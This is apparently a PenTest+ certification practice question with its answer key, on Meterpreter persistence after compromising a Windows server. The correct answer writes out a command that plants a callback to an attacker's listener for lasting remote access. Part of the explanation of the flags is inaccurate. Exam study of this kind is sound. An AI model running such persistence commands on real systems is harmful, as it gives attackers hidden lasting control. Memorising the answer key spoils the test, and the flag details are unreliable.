CompTIA PenTest+ (PT0-003)Post-exploitation and Lateral MovementMedium
A penetration tester has compromised an internal Windows server and established a Meterpreter session. To ensure persistent access, the tester decides to create a hidden service that will automatically restart if the system reboots. Which Meterpreter command or technique would best achieve this, considering stealth and persistence?
- Aexecute -f cmd.exe -c -H -i
- Bsysinfo
- Cmigrate -N explorer.exe
- Drun persistence -U -i 30 -p 4444 -r 192.168.1.100
Show answer & explanationAnswer & explanation
Correct answer: D. run persistence -U -i 30 -p 4444 -r 192.168.1.100
The 'run persistence' Meterpreter script is designed to establish persistent access on a compromised machine. The '-U' flag creates a hidden userland persistence mechanism, '-i' sets the interval for callback attempts, '-p' specifies the listener port, and '-r' specifies the remote host (attacker's machine). This creates a service that will call back, providing persistence.
Why the other options are wrong
- A. This command executes a command prompt but does not establish persistence.
- B. This command displays system information and does not establish persistence.
- C. This command migrates the Meterpreter session to another process but does not create a persistent mechanism for reboots.
Meterpreter Persistence
Establishing a mechanism on a compromised system that ensures continued access, even after system reboots or session termination, often by creating services, scheduled tasks, or startup entries.
- Meterpreter's 'run persistence' script automates common persistence techniques.
- Persistence can be userland or system-level.
- Hidden services or scheduled tasks are common methods.
Memory trick: Meterpreter's Run Persistence: 'R'eally 'P'owerful 'S'tealth for Reboots!